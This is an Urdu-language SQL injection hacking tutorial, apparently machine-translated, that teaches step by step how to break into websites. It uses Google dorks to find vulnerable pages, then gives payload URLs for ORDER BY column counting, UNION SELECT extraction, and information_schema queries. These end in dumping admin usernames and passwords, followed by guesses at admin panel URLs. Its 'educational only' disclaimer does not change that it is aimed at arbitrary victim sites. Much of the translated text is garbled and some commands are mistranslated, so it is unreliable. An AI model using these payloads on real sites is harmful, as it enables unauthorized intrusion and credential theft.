سب مینجمنٹ کے بارے میں SQL انجکشن


ڈس کلیمر

اس کتاب میں فراہم کردہ تمام معلومات صرف تعلیمی مقصد کے لئے ہے، اگر کسی کو کسی غیر قانونی سرگرمی میں مل جائے گا تو ہمیں کوئی ذمہ داری نہیں ہے اس کے لئے.


>

شروع کرنے سے پہلے ایک اہم نوٹ

ہیکنگ انٹیلی جنس آرٹ ہے؛ اگر آپ کو یہ آرٹ نہیں ہے تو پھر کتاب چھوڑ دو اور آرام کرو ورنہ آپ کو سر درد محسوس ہو گا. اگر آپ تجربہ کار شخص ہیں اس آرٹ کے بعد آپ اسے آسانی سے سمجھ سکیں گے. بس ایک بات یاد رکھیں وہاں نہیں ہے خصوصی مہارتوں کو کچھ نیا سیکھنے کی ضرورت ہے، صرف دماغ مثبت اور ہونا چاہئے ہمیشہ سمجھنے کے لئے تیز رفتار سے کھولیں.


چیمپئن 1:


SQL انضمام کے لئے مکمل گائیڈ:


ہم اس سے پہلے کہ SQL انجکشن کیا ہے دیکھتے ہیں. ہمیں پتہ ہونا چاہئے SQL اور ڈیٹا بیس کیا ہیں


ڈیٹا بیس:

ڈیٹا بیس ڈیٹا کا مجموعہ ہے. انٹرنیٹ سے منسلک ایک ایسی جگہ میں جس میں ایک یا زیادہ ویب صفحات کی نقطہ نظر کو برقرار رکھا جاتا ہے، ڈیٹا بیس کو صارف کو ذخیرہ کرنے کے لئے استعمال کیا جاتا ہے ایڈز، پاس ورڈ، ویب پیج کی تفصیلات اور مزید. ڈیٹا بیس کی کچھ فہرست یہ ہیں:


ڈی بی سرورز،

MySQL (اوپن سورس)،

MSSQL،

MS-ACCESS،

اوریکل،

پوسٹگر SQL (کھلا ذریعہ)،

SQLite،


SQL:

SQL کے طور پر تشکیل شدہ سوال کی زبان کو جانا جاتا ہے. ڈیٹا بیس کے ساتھ بات چیت کرنے کے لئے، ہم ہیں SQL سوال کا استعمال کرتے ہوئے. ہم ڈیٹا بیس سے سوال کررہے ہیں لہذا اسے سوال کی زبان کہا جاتا ہے.


مکمل حوالہ سے تعریف:

SQL کمپیوٹر کے ذریعہ محفوظ کردہ ڈیٹا منظم کرنے، انتظام، اور دوبارہ حاصل کرنے کیلئے ایک آلہ ہے ڈیٹا بیس نام "SQL" کا نام ساختہ سوال زبان کے لئے ایک تحریر ہے. کے لئے تاریخی وجوہات، SQL عام طور پر "sequel،" لیکن متبادل تلفظ کا اعلان کیا جاتا ہے "ایس. ایل." بھی استعمال کیا جاتا ہے. جیسا کہ نام کا مطلب ہے، SQL ایک کمپیوٹر زبان ہے جسے آپ استعمال کرتے ہیں ڈیٹا بیس کے ساتھ بات چیت اصل میں، SQL ایک مخصوص قسم کے ڈیٹا بیس کے ساتھ کام کرتا ہے، جس کا نام ایک ہے رشتہ دار ڈیٹا بیس.


SQL کے لئے سادہ بنیادی سوالات:

table_name سے

منتخب کریں: یہ بیان استعمال کیا جاتا ہے ٹیبل کے مواد سمیت کالم کا نام شامل کرنے کے لئے.


مثال کے طور پر:

> صارفین سے منتخب کریں؛


table_name (column_names، ...) اقدار (کالمز کے لئے متعلقہ اقدار) میں داخل کریں: ڈیٹا میں میز ڈالنے کیلئے.


e .: صارفین (صارف نام، صارفی) اقدار ("BreakTheSec"، "وقفے") میں ڈالیں؛ میں اپنی اگلی کتاب میں SQL QUERY کے بارے میں زیادہ تفصیل اور سوال دے دونگا.


SQL انجیکشن کیا ہے

SQL انجکشن موجودہ میں ہیکنگ کا عام اور مشہور طریقہ ہے. کچھ نوکری یہ سوچ رہے ہیں یہ ایک چھوٹا سا کام ہے جس کی وجہ سے کچھ مذاق یا سکرپٹ سافٹ ویئر کی طرح "ہیوجی"، لیکن اگر آپ اسے دستی طور پر دیکھتے ہیں تو یہ ایک بہت بڑا موضوع ہے اور اس پر بہت ساری کتابیں لکھی جا سکتی ہیں. اس طریقہ کا استعمال ایک غیر مجاز شخص کسی ویب سائٹ کے ڈیٹا بیس تک رسائی حاصل کرسکتا ہے. حملہ آور ڈیٹا بیس سے تمام تفصیلات حاصل کرسکتا ہے.


کیا حملہ آور کر سکتا ہے؟

ByPassing Logins

خفیہ ڈیٹا تک رسائی حاصل

ویب سائٹ کے مواد کو ترمیم کریں

میرے SQL سرور کو بند کرنا


اب SQL انجکشن کے لئے حقیقی طریقہ کار میں چلو.


مرحلہ 1:


حساس ویب سائٹ تلاش کرنا:


SQL انجیکشن کے لئے ہمارے بہترین شراکت دار گوگل ہے. ہم کمزور ویب سائٹس تلاش کر سکتے ہیں (ہیکبل ویب سائٹس) Google ڈارک کی فہرست کا استعمال کرتے ہوئے. Google ڈارک Google تلاش کے ذریعے خطرناک ویب سائٹس تلاش کر رہا ہے چالیں. Google میں تلاش کرنے کے لئے بہت ساری چالیں موجود ہیں. لیکن ہم تلاش کرنے کے لئے "inurl:" کمانڈ استعمال کرنے جا رہے ہیں کمزور ویب سائٹس.


Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=


اگر آپ مزید تلاش کرنا چاہتے ہیں تو پھر Google کے لئے تازہ ترین SQL ڈارک تلاش کریں.


استعمال کرنے کے لئے کس طرح؟


مندرجہ ذیل کمانڈ میں سے ایک کاپی کریں اور Google سرچ انجن باکس میں چسپاں کریں. داخل کریں.

آپ ویب سائٹس کی فہرست حاصل کرسکتے ہیں. ہمیں خطرے کی جانچ پڑتال کے لۓ ایک ویب سائٹ ملاحظہ کرنا ہے. تو پہلی ویب سائٹ سے شروع کریں. >

نوٹ: اگر آپ خاص ویب سائٹ ہیک کرنا چاہتے ہیں تو پھر کوشش کریں:

سائٹ: www.victimsite.com dork_list_commands

مثال کے طور پر:

سائٹ: www.victimsite.com inurl: index.php؟ id =


مرحلہ 2:


خرابی کی جانچ پڑتال کر رہا ہے:


اب ہمیں ویب سائٹس کی خرابی کی جانچ پڑتال کرنا چاہئے. خطرے کی جانچ پڑتال کرنے کے لئے، واحد میں شامل کریں url کے اختتام پر حوالہ جات (') اور داخلہ کو مار ڈالو. (تعداد اور ایک سنگل کوٹ کے درمیان کوئی جگہ نہیں)


مثال کے طور پر:

http://www.victimsite.com/index.php?id=2'

اگر صفحے پر ایک ہی صفحے میں رہتا ہے یا دکھایا گیا ہے کہ وہ صفحہ نہیں ملا یا کچھ دوسرے ویب صفحات دکھائے. پھر یہ کمزور نہیں ہے

اگر یہ کسی بھی غلطی کو جو کہ SQL سوال سے متعلق ہے، تو یہ کمزور ہے. Cheers ..!

مثال کے طور پر:

آپ کے پاس اپنے SQL نحو میں ایک غلطی ہے؛ دستی جو آپ کے ایس ایس ایل ایل سرور سے مل کر چیک کریں دائیں نحو کے لئے ورژن 1 'لائن' کے قریب کے قریب استعمال کرنے کے لئے


مرحلہ 3:


کالموں کو تلاش کرنا:


اب ہم نے انٹرنیٹ سے متعلق ایک مقام پایا ہے جو ایک یا زیادہ ویب صفحات کو برقرار رکھتا ہے وہ کمزور ہے. اگلے مرحلے میز میں کالموں کی تعداد تلاش کرنا ہے. اس کے لۓ اکاؤنٹس (")" "آرڈر آرڈر" کے ساتھ ایک ہی حوالہ جات کی جگہ لے لیتے ہیں. (نمبر اور بیان کی طرف سے آرڈر)

1،2،3،4 سے ن، تبدیل کریں، 5.6، ... ن. جب تک آپ کو "نامعلوم کالم" کی غلطی ملتی ہے.


e.g.:


http://www.victimsite.com/index.php?id=2 order by 1

http://www.victimsite.com/index.php?id=2 order by 2

http://www.victimsite.com/index.php?id=2 order by 3

http://www.victimsite.com/index.php?id=2 order by 4


جب تک آپ کو "نامعلوم کالم"

کی غلطی ملتی ہے تو نمبر تبدیل کریں

اگر آپ "x" نمبر کی کوشش کرتے وقت غلطی حاصل کرتے ہیں تو پھر کالم میں سے کوئی "x-1" نہیں ہے.


میرا مطلب ہے:

http://www.victimsite.com/index.php?id=2 order by 1(noerror)

http://www.victimsite.com/index.php?id=2 order by 2(noerror)

http://www.victimsite.com/index.php?id=2 order by 3(noerror)

http://www.victimsite.com/index.php?id=2 order by 4(noerror)

http://www.victimsite.com/index.php?id=2 order by 5(noerror)

http://www.victimsite.com/index.php?id=2 order by 6(noerror)

http://www.victimsite.com/index.php?id=2 order by 7(noerror)

http://www.victimsite.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7 .


کچھ وقت اوپر اوپر کام نہیں کر سکتا. اس وقت بیان کے آخر میں "-" شامل کریں.

مثال کے طور پر:

http://www.victimsite.com/index.php?id=2 order by 1--



مرحلہ 4:


متنوع کالمز دکھائیں:


"اتحادی کالمز کے بعد منتخب کریں" کا استعمال کرتے ہوئے ہم میز کے خطرناک حصہ تلاش کر سکتے ہیں. تبدیل کریں اس بیان کے ساتھ "آرڈر کی طرف سے". اور شناختی شکل میں منفی کو تبدیل (میرا مطلب ہے ID = -2، تبدیل کرنا ضروری ہے، لیکن میں کچھ ایسی جگہ جس انٹرنیٹ سے منسلک ہوتی ہے جو کسی یا ایک سے زیادہ ویب صفحات کو برقرار رکھتا ہے وہ تبدیل کرنے کے بغیر کام کر سکتا ہے).


کالموں کو تبدیل کریں اس کے بعد 1 سے X-1 (کالموں کی تعداد) سے الگ ہونے کے ساتھ کمانڈ (،).


مثال کے طور پر:

اگر کالم کی تعداد 7 ہے، تو سوال کی پیروی کی جاتی ہے:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

اگر اوپر کا طریقہ کار نہیں ہے تو پھر کوشش کریں:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

یہ صفحہ میں کچھ نمبر دکھائے گا (یہ 'x' قیمت سے کم ہونا ضروری ہے، میرا مطلب ہے کہ نمبر سے کم یا کم کالم).


اس طرح:

اب 1 نمبر منتخب کریں.

یہ 3،7 دکھا رہا ہے. آئیے نمبر 3 لیں.


مرحلہ 5:


تلاش کرنے والے ورژن، ڈیٹا بیس، صارف


اب 3 "سوال () کے ساتھ سوال سے تبدیل کریں"


مثال کے طور پر:

http://www.victimsite.com/index.php؟id=-2 اور 1 = 2 یونین کا انتخاب 1،2، ورژن ()، 4،5،6،7 -


یہ ورژن 5.0.1 یا 4.3 کے طور پر دکھایا جائے گا. کچھ پسند کرتا ہے.


ڈیٹا بیس کو تلاش کرنے کیلئے ڈیٹا بیس () اور صارف () کے ساتھ ورژن () کو تبدیل کریں.


مثال کے طور پر:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--


http://www.victimsite.com/index.php?id=-

and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

http://www.victimsite.com/index.php?id=-2and 1=2 union select

1,2,unhex(hex(@@version)),4,5,6,7--



مرحلہ 6:


ٹیبل کا نام تلاش کرنا


اگر ورژن 5 یا اس سے اوپر ہے. پھر ان مراحل پر عمل کریں. اب ہمیں ٹیبل کا نام تلاش کرنا ہوگا ڈیٹا بیس 3 "group_concat (table_name) کے ساتھ تبدیل کریں اور info_schema.tables سے" شامل کریں جہاں table_schema = ڈیٹا بیس () "


مثال کے طور پر:


http://www.victimsite.com/index.php?id=-2 and 1=2 union select

1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where

table_schema=database()--


اب یہ ٹیبل کے نام کی فہرست دکھایا جائے گا. ٹیبل کا نام تلاش کریں جو منتظم یا صارف سے متعلق ہے.


اب "منتظم" کی میز منتخب کریں.


اگر ورژن 4 یا کچھ دوسرے ہے، تو آپ کو میز کے نام کا اندازہ لگانا پڑے گا. (صارف، بلبسیر). یہ مشکل ہے اور بنو ورژن 4 کے ساتھ سلسل انجکشن کرنا.



مرحلہ 7:


کالم کا نام تلاش کرنا


اب "group_concat (table_name)" group_concat (column_name) "کے ساتھ تبدیل کریں


"info_schema.tables سے table_schema = ڈیٹا بیس () -" کے ساتھ "FROM

سے تبدیل کریں.

info_schema.columns table_name = ایس ایس ایل -

جب

اب احتیاط سے سننا، ہمیں ٹیبل کا نام MySql CHAR () تار اور تبدیل کرنے میں تبدیل کرنا ہوگا اس کے ساتھ اسکرپٹ.


Tablameame کے لئے Mysqlhar () تلاش کریں:

ہیک بابر اضافی انسٹال کرنے والے سب سے پہلے:

https://addons.mozilla.org/en-US/firefox/addon/3899

اب

منتخب کریں sql-> مسقل-> اقبال ()



یہ چھوٹی ونڈو کھولیں گے، جس میں آپ نے پایا ٹیبل کا نام درج کریں. میں منتظم کا استعمال کرنے جا رہا ہوں ٹیبل کا نام.



ٹھیک ہے پر کلک کریں

اب آپ ہیک ٹول بار میں CHAR (نمبروں سے جدا کردہ نمبر) دیکھ سکتے ہیں.



کوڈ "کاپیشکر"

کے بجائے url کے اختتام پر کوڈ کاپی اور پیسٹ کریں

مثال کے طور پر:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select

1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where

table_name=CHAR(97, 100, 109, 105, 110)--


اب یہ کالم کی فہرست دکھائے گی.

like_admin، پاس ورڈ، admin_id، admin_name، admin_password، فعال، id، admin_name، admin_pas s، admin_id، admin_name، admin_password، ID_admin، admin_username، صارف نام، پاس ورڈ ..... وغیرہ.


اب replace group_concat (column_name) کے ساتھ تبدیل کریں group_concat (کالمین نام، 0x3a، anothercolumnname).


فہرست کالم نام سے کالمیم نام کو تبدیل کرنا چاہئے. دوسرا کالمیم نام درج فہرست کالم نام سے تبدیل کرنا چاہئے.


اب "info_schema.columns کی طرف سے تبدیل کریں جہاں table_name = CHAR (97، 100، 109، 105، 110) "table_name سے"

کے ساتھ

مثال کے طور پر:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--


کچھ عرصے سے یہ دکھایا جائے گا کہ کالم نہیں ملا.

پھر ایک اور کالم ناموں کی کوشش کریں


اب وہ صارف نام اور پاس ورڈز کریں گے


چیئر .....!

اگر ایک ایسی جگہ سے انٹرنیٹ سے منسلک ہوتا ہے جو ایک یا زیادہ ویب صفحات کو برقرار رکھتا ہے تو پھر آپ کے لئے جاک بٹ ہوتا ہے. آپ کے پاس صارف کے نام اور پاس ورڈ کی فہرست ہوگی.


کچھ وقت جب آپ کو ای میل ایڈز بھی مل سکتے ہیں، لطف اندوز آپ کو گودی ملتا ہے جو سونے کی پیداوار کر سکتا ہے انڈے.


مرحلہ 8:


ایڈمن پینل تلاش کرنا:


ایڈمن پینل کو تلاش کرنے کے لئے بورنگ اور وقت لیا جاتا کام ہے، کیونکہ آپ کو ایڈمن پینل کی طرح اندازہ کرنا ہوگا:


http://www.victimsite.com/admin.php

http://www.victimsite.com/admin/

http://www.victimsite.com/admin.html

http://www.victimsite.com:2082/

وغیرہ.


اگر آپ قسمت ہیں تو، آپ کو منتظم صفحہ مل جائے گا.


اگر آپ کو تازہ ترین منتظم url کی فہرست چاہتے ہیں تو اسے گوگل پر تلاش کریں، یا ایڈمن پینل اسکرپٹ کو استعمال کرنے کے لئے یہ بہتر ہے پرل میں




Advertisements